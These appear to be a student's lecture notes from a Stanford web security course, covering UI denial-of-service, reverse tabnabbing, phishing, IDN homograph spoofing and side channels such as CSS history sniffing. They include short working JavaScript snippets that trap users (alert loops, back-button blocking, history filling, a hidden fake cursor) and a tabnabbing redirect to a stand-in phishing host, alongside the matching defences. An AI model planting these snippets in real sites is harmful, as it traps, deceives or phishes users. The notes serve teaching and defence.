Alex's Notes

CS253 Lecture Summaries: Part IX: DoS, Phishing, Side Channels

Part of Web Security - Stanford CS 253

Lots of attacks mentioned in the [slides](https://web.stanford.edu/class/cs253/lectures/Lecture%2008.pdf)

A mop-up of client-side security issues not covered to date:

UI Denial of Service

Demonstrated with theannoyingsite.com.

Override browser defaults: disorient or trap the user on site

Scareware: sites which intimidate the user into buying a product by trapping them on an unwanted site.

Annoy the user: can be harmless, or cause users to lose unsaved work.

Browsers used to be a single process, and so this would halt the whole browser:

while(true) {
  window.alert("You're trapped!");
}

The initial solution was a checkbox that allowed users to suppress further alerts from the page.

The current solution: browsers are now multi-process, so you can just close the offending tab.

One useful way of thinking about this is that the APIs provided by the browser can be categorized into different levels, depending on restrictions:

Level 0

Restrictions:

No restrictions. API can be used immediately and indiscriminately

Examples:

DOM, CSS, window.moveTo(), file download, hide mouse cursor. Note that file download is in this class!

Level 1

Restrictions:

User interaction required. API cannot be used except in response to a user activation (click, keypress). Note that scrolling doesn’t count.

Examples:

Element.requestFullscreen(), navigator.vibrate(), copy text to clipboard, speech synthesis, window.open()

Level 2

Restrictions:

User “engagement” required. API cannot be used until the user demonstrates high engagement with a website. The browser keeps an engagement metric per site; once the threshold is reached, these APIs become active.

Examples:

Autoplay sound, prompt to install website to homescreen.

Level 3

Restrictions:

User permission required. API cannot be used until the user grants explicit permission.

Examples:

Camera, microphone, geolocation, USB, MIDI device access
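As a sketch of Level 1 gating: a call like window.open() succeeds only while there is transient user activation, so it typically has to live inside a click handler. The handler name and URL below are hypothetical:

```javascript
// Sketch of Level 1 gating: window.open() needs transient user activation.
function onOpenButtonClick() {
  // Inside a click handler, the user activation lets the popup open.
  const win = window.open('https://example.com', '_blank')
  if (win === null) {
    // Still blocked, e.g. the activation was already consumed.
    console.log('popup blocked')
  }
}

// In a real page:
// document.addEventListener('click', onOpenButtonClick)
```

Calling window.open() outside any handler (say, from a timer) is what classic popup blockers stop; the activation requirement is the generalised form of that rule.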

So how can a site be annoying?

A site can call window.open() in response to an interaction, so you can do this:

document.addEventListener('click', () => {
  const win = window.open('', '', 'width=100,height=100')
  win.moveTo(10,10)
  win.resizeTo(200,200)
})

You can intercept all user interaction and run your own code:

function interceptUserInput(onInput) {
  // passive: false lets the handler call event.preventDefault()
  document.body.addEventListener('touchstart', onInput, {passive: false})

  document.body.addEventListener('mousedown', onInput)
  document.body.addEventListener('mouseup', onInput)
  document.body.addEventListener('click', onInput)

  document.body.addEventListener('keydown', onInput)
  document.body.addEventListener('keyup', onInput)
  document.body.addEventListener('keypress', onInput)
}

You can disable the back button:

function blockBackButton () {
  window.addEventListener('popstate', () => {
    window.history.forward()
  })
}

And fill the user’s history so they can’t just click out of it:

function fillHistory() {
  for (let i = 1; i < 20; i++) {
    window.history.pushState({}, '', window.location.pathname + '?q=' + i)
  }
  //set location back to the initial location
  window.history.pushState({}, '', window.location.pathname)
}

You can copy to the clipboard without a permission prompt, and you can ask to register as the protocol handler for various protocols.
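A sketch of the clipboard path: navigator.clipboard.writeText needs a user gesture and a secure context, but shows no permission prompt. The function and text below are hypothetical; the clipboard object is a parameter so the sketch is testable outside a browser:

```javascript
// Sketch: write to the clipboard from a click handler. No permission
// prompt appears, though a user gesture and secure context are required.
function copyOnClick(text, clipboard = navigator.clipboard) {
  return clipboard.writeText(text)
    .then(() => 'copied')
    .catch(() => 'blocked')
}

// In a real page:
// button.addEventListener('click', () => copyOnClick('attacker text'))
// Registering as a protocol handler is similarly gated on a gesture:
// navigator.registerProtocolHandler('mailto', 'https://evil.example/?to=%s')
```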

Cursor attacks are common; you can hide the cursor really easily with:

document.documentElement.style.cursor = 'none'

Then you can create a fake cursor that is offset. You could then make it so that the true cursor would be clicking allow on a permission prompt when the fake cursor looked like it was clicking something else.
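A minimal sketch of the whole trick, with hypothetical names (the decoy image and offsets are made up, and the document is passed in so the sketch is testable):

```javascript
// Sketch of a fake-cursor attack: hide the real cursor and draw a
// decoy image offset from the true pointer position.
function attachFakeCursor(doc, offsetX, offsetY) {
  doc.documentElement.style.cursor = 'none' // hide the real cursor

  const fake = doc.createElement('img')
  fake.src = 'cursor.png'                   // hypothetical decoy image
  fake.style.position = 'fixed'
  doc.body.appendChild(fake)

  doc.addEventListener('mousemove', (e) => {
    // The decoy trails the real pointer by a fixed offset, so the user
    // clicks somewhere other than where they think they are clicking.
    fake.style.left = (e.clientX + offsetX) + 'px'
    fake.style.top = (e.clientY + offsetY) + 'px'
  })
}
```

With the offset chosen carefully, the real (invisible) cursor can sit over a permission prompt's Allow button while the decoy appears to hover over something harmless.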

Lots of sites used to have their logout route be a GET request. But GET requests can be sent cross-site (see CS253 Lecture Summaries: Part IV: CSRF, Same Origin Policy).

So you could sign the user out of lots of sites just by hitting their logout routes. Logout routes should be POST, and cookies should be SameSite. Remember you can POST a form to another site, so using POST alone is not enough; you also have to keep cookies off cross-site requests.
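A sketch of the defence side, with a hypothetical cookie name: serve the session cookie with a SameSite attribute. Note SameSite=Lax still sends the cookie on top-level GET navigations, which is exactly why logout must not be a GET; Lax does block the cross-site form POST case.

```javascript
// Sketch: a Set-Cookie value for a session cookie that won't ride along
// on cross-site subresource requests or cross-site form POSTs.
// Cookie name and value are hypothetical.
function sessionCookie(value) {
  return `session=${value}; Secure; HttpOnly; SameSite=Lax`
}

// e.g. in a Node-style handler:
// res.setHeader('Set-Cookie', sessionCookie(sessionId))
```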

Tabnabbing (strictly, reverse tabnabbing) is a nasty attack. It exploits the fact that you can open a new tab from a link by setting the attribute target="_blank" on the anchor tag.

Then the new tab will have a reference to the original page via window.opener. If you have a reference to a window you can change its location. See MDN

So the new tab could navigate the original page to a spoofed Facebook Messenger site that asks the user to log in again and harvests their credentials: classic phishing.

How do we defend against this? For any target="_blank" links we need to add rel="noopener". Then window.opener will be null in the new tab.
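A sketch of both sides, with hypothetical URLs; the document is passed in so the defence helper is testable:

```javascript
// Attacker side, running in the tab opened via target="_blank"
// without noopener:
//   if (window.opener) {
//     window.opener.location = 'https://phish.example/login'
//   }

// Defence: build outbound links with rel="noopener" so window.opener
// is null in the new tab (noreferrer also implies noopener).
function safeLink(doc, href, text) {
  const a = doc.createElement('a')
  a.href = href
  a.textContent = text
  a.target = '_blank'
  a.rel = 'noopener noreferrer'
  return a
}
```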

There is also a newer HTTP header, Cross-Origin-Opener-Policy: same-origin. Browsers will use a separate OS process to load the site, preventing cross-window attacks and process side-channel attacks by severing references to other browsing contexts.
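A minimal sketch of sending the header from a Node-style response handler (the handler shape is an assumption, not from the lecture):

```javascript
// Sketch: set COOP so the page gets its own browsing context group.
// Any window.opener reference from another origin is then severed.
function setCoop(res) {
  res.setHeader('Cross-Origin-Opener-Policy', 'same-origin')
}
```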

Phishing

Phishing is acting like a reputable entity to trick the user into divulging sensitive information such as login credentials or account information.

Often easier than attacking the security of a system directly: Just get the user to tell you their password.

Security is fundamentally a people problem - Schneier.

Unicode can be used to spoof domain names.

Hostnames containing Unicode characters are transcoded to a subset of ASCII consisting of letters, digits, and hyphens, called Punycode.

Punycode is a representation of Unicode using the limited ASCII character subset used for Internet host names.

This allows registering domains with non-ASCII characters.

But some scripts contain characters that look identical to Latin ones (homoglyphs); each is a separate Unicode character that renders the same in browser address-bar fonts.

This is called an IDN homograph attack. It is akin to domain typosquatting, but here the links look identical unless the browser intervenes.
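A sketch of the transcoding using the WHATWG URL parser (as in Node): the first hostname below swaps in a Cyrillic 'а' (U+0430) for the Latin 'a', and the parser converts it to its Punycode form:

```javascript
// Sketch: Unicode hostnames are transcoded to their Punycode form.
const spoofedHost = new URL('https://аpple.com').hostname // Cyrillic 'а'
const realHost = new URL('https://apple.com').hostname

console.log(spoofedHost) // an 'xn--' Punycode hostname, not 'apple.com'
console.log(realHost)    // 'apple.com'
```

The two links render identically in many fonts, but they resolve to entirely different registrable domains.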

Browsers will transcode the URL and display the Punycode form when it looks suspicious.

Another vector is fullscreen mode

Another is cookiejacking: you used to be able to load an iframe with a src pointing at a cookie file you don't own.

Filejacking is another one: a file-upload dialog looks like a download dialog, so you can trick a user into uploading a whole folder.

UI security attacks are attacks on human perception. Browsers allow untrusted sites to put content in a place that seems trusted.

Side Channel Attacks

Side channel attacks are attacks based on information gathered from the implementation of a computer system, rather than weaknesses in the implemented algorithm itself.

Possible sources of leaks: timing information, power consumption, electromagnetic leaks, and sound can each provide an extra source of information that can be exploited.

A classic example is timing. If a system tries to hide the difference between event A and event B, but they take different amounts of time, the timing difference reveals which event occurred.

You can monitor the power usage of a device during an encryption operation and reconstruct the secret key!

A classic attack in web world is the CSS history attack.

The idea is really simple: add a link to the page and check its colour. Browsers styled visited links purple and unvisited links blue, so just by looking at the colour of the link you knew whether the user had visited the page.
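A sketch of the original probe, which is mitigated in modern browsers. The document and style-reading function are passed in for illustration, and the purple below is the classic default :visited colour (#551A8B):

```javascript
// Sketch of the historical probe: add a link, read back its computed
// colour, and infer history membership from it.
function probablyVisited(doc, getStyle, url) {
  const link = doc.createElement('a')
  link.href = url
  doc.body.appendChild(link)
  const colour = getStyle(link).color
  doc.body.removeChild(link)
  // Classic default UA styles: rgb(85, 26, 139) purple for visited links.
  return colour === 'rgb(85, 26, 139)'
}
```

In a real page getStyle would be getComputedStyle, and an attacker could run this probe over thousands of URLs in milliseconds; that scale is what made the leak so serious.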

How was this tackled? Mozilla restricted the CSS properties you can apply with the :visited pseudo-class. You can't change size or position, or load a resource.

You can prevent some timing attacks by making the code paths for visited and unvisited links take the same length of time.

Browsers also prevent JS from reading the real colour of a link: when you check a link's style, it always reports the unvisited style.

But lots of leaks remain.

Could we improve it? We could ban CSS properties that affect rendering speed. We could double-key the visited-link history (e.g. site B shows as visited on site A only if the user clicked from site A to site B, but not on site C). Or we could just eliminate the attack vector by removing the ability to style visited links.

Cross-origin images can also leak data (e.g. if the image differs based on logged-in status).

Ambient light sensors can also leak. E.g. you can detect browsing history by styling links with a full white/black background and watching whether the light level changes.

The gyroscope API can be used to detect the orientation of the device, and it could originally be called without permission. But the gyroscope is so precise that it can pick up audio signals from the phone's vibrations. So now the gyroscope API is gated behind a permission.

Summary

There is a tension between security and capabilities of the browser.

Phishing is a human problem, though technical solutions can help.

Side channels exist all over the place, and are really hard to prevent.